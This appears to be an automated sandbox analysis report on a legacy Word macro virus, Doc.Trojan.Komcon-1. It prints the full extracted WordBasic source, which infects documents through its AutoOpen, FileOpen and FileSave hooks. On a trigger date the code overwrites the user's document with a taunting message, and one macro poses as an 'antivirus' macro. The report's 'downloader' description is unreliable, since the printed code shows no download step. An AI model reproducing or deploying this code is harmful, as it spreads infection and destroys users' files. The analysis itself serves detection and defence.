Doc.Trojan.Komcon-1 Office (OLE) malware analysis — malicious · 4a6fed06a8a6f0a7

MALICIOUS

Office (OLE)

45.5 KB Created: 1999-09-07 10:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 3456114a1f46263e1e61d9191fcb34a6 SHA-1: 5654acae39898beb3e7de012d803f99626ee25e0 SHA-256: 4a6fed06a8a6f0a7cb55a4fba1a4e6d975d16514a1700cdd568f3e668f806132

188 Risk Score

Malware Insights

Doc.Trojan.Komcon-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Komcon-1'. The AutoOpen macro copies other macros such as 'ToolsMacro' and 'FileOpen' into the global macro storage, indicating an attempt to execute malicious code. This behavior is consistent with a macro-based downloader designed to fetch and execute further stages.

Heuristics 4

ClamAV: Doc.Trojan.Komcon-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Komcon-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "autoopen"
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5058 bytes
SHA-256: `40703b1843b2f2c68b99f56cc35064204a148d39d2a054e778d36e0371f70afc`
Detection ClamAV: Doc.Trojan.Komcon-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "autoopen" '============================ ' (C) Tanto Prihartanto, 1998 '============================ Public Sub MAIN() Dim dokumen$ Dim stmacro$ dokumen$ = WordBasic.[FileName$]() stmacro$ = dokumen$ + ":autoopen" WordBasic.MacroCopy stmacro$, "Global:RAO" stmacro$ = dokumen$ + ":RTM" WordBasic.MacroCopy stmacro$, "Global:ToolsMacro" stmacro$ = dokumen$ + ":RFO" WordBasic.MacroCopy stmacro$, "Global:FileOpen" stmacro$ = dokumen$ + ":RFS" WordBasic.MacroCopy stmacro$, "Global:Filesave" stmacro$ = dokumen$ + ":RFT" WordBasic.MacroCopy stmacro$, "Global:FileTemplates" 'stmacro$ = dokumen$ + ":RFT" 'MacroCopy stmacro$, "Global:Filetemplates" WordBasic.FileSaveAll 1, 1 End Sub Attribute VB_Name = "RFO" Public Sub MAIN() Dim dokumen$ Dim tanggal Dim bulan Dim jml Dim sname$ Dim j Dim i Dim stmacro$ WordBasic.DisableInput WordBasic.DisableAutoMacros 1 On Error GoTo -1: On Error GoTo done Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False) WordBasic.CurValues.FileOpen dlg WordBasic.Dialog.FileOpen dlg WordBasic.FileOpen dlg dokumen$ = WordBasic.[FileName$]() tanggal = WordBasic.Day(WordBasic.Now()) bulan = WordBasic.Month(WordBasic.Now()) If (tanggal = 18) And (bulan = 2) Then GoTo pl jml = WordBasic.CountMacros(1) If jml = 0 Then GoTo tulari sname$ = WordBasic.[MacroFileName$]("RAE") If smane$ = dokumen$ Then GoTo done ReDim mname__$(jml) For j = 1 To jml mname__$(j) = WordBasic.[MacroName$](j, 1) Next j For i = 1 To jml WordBasic.Organizer Delete:=1, Source:=dokumen$, Name:=mname__$(i), Tab:=3 WordBasic.PrintStatusBar "Deletting macro " + mname__$(i) Next i GoTo tulari pl: Dim pesannya$ pesannya$ = "Rupanya Anda sedang sial........, Dokumen Anda kini " + _ "hilang. Ini bukan perbuatan Anda tapi ulah saya." + _ " Selamat Ngetik lagi...semoga Anda masih punya Back-upnya" WordBasic.FileClose 2 WordBasic.FileNew Template:="Normal" WordBasic.Font "Arial" WordBasic.JustifyPara WordBasic.FontSize 11 WordBasic.Insert "Salam krisis..." WordBasic.InsertPara WordBasic.Insert pesannya$ WordBasic.InsertPara WordBasic.InsertPara WordBasic.InsertPara WordBasic.InsertPara WordBasic.RightPara WordBasic.Bold WordBasic.FontSize 13 WordBasic.Insert "(C) Semarang, May 1998" WordBasic.InsertPara WordBasic.RightPara WordBasic.Insert "Rosw@ti" WordBasic.FileSaveAs Name:=dokumen$, Format:=1 WordBasic.PrintStatusBar " Penghancuran dokumen telah dilakukan dengan sukses....." GoTo done tulari: WordBasic.FileSaveAs Name:=dokumen$, Format:=1 stmacro$ = dokumen$ + ":autoopen" WordBasic.MacroCopy "Global:RAO", stmacro$ stmacro$ = dokumen$ + ":RFO" WordBasic.MacroCopy "Global:FileOpen", stmacro$ stmacro$ = dokumen$ + ":RFS" WordBasic.MacroCopy "Global:FileSave", stmacro$ 'stmacro$ = dokumen$ + ":RAE" 'MacroCopy "Global:AutoExec", stmacro$ stmacro$ = dokumen$ + ":RFT" WordBasic.MacroCopy "Global:FileTemplates", stmacro$ stmacro$ = dokumen$ + ":RTM" WordBasic.MacroCopy "Global:ToolsMacro", stmacro$ WordBasic.Filesave done: End Sub Attribute VB_Name = "RFS" Public Sub MAIN() Dim dokumen$ Dim pj Dim loc_ Dim nama$ Dim dlg As Object Dim jml Dim sname$ Dim stmacro$ On Error GoTo -1: On Error GoTo done dokumen$ = WordBasic.[FileName$]() pj = Len(dokumen$) loc_ = InStr(dokumen$, ".") nama$ = WordBasic.[Left$](dokumen$, pj - loc_) If Len(nama$) > 8 Then Set dlg = WordBasic.DialogRecord.FileSaveAs(False) WordBasic.CurValues.FileSaveAs dlg WordBasic.Dialog.FileSaveAs dlg WordBasic.FileSaveAs dlg dokumen$ = WordBasic.[FileName$]() End If jml = WordBasic.CountMacros(1) If jml = 0 Then GoTo tulari sname$ = WordBasic.[MacroFileName$]("RAE") If sname$ = dokumen$ Then GoTo done Else GoTo tulari tulari: WordBasic.FileSaveAs Name:=dokumen$, Format:=1 stmacro$ = dokumen$ + ":autoopen" WordBasic.MacroCopy "Global:RAO", stmacro$ stmacro$ = dokumen$ + ":RFO" WordBasic.MacroCopy "Global:FileOpen", stmacro$ stmacro$ = dokumen$ + ":RFS" WordBasic.MacroCopy "Global:FileSave", stmacro$ 'stmacro$ = dokumen$ + ":RAE" 'MacroCopy "Global:AutoExec", stmacro$ stmacro$ = dokumen$ + ":RFT" WordBasic.MacroCopy "Global:FileTemplates", stmacro$ stmacro$ = dokumen$ + ":RTM" WordBasic.MacroCopy "Global:ToolsMacro", stmacro$ done: WordBasic.Filesave End Sub Attribute VB_Name = "RFT" Public Sub MAIN() Attribute MAIN.VB_Description = "F%" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.RFT.MAIN" WordBasic.DisableInput 1 End Sub Attribute VB_Name = "RTM" Public Sub MAIN() Attribute MAIN.VB_Description = "F%565" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.RTM.MAIN" WordBasic.MsgBox "Antivirus macro v.1.0.0 ", "by Rosw@ti" End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.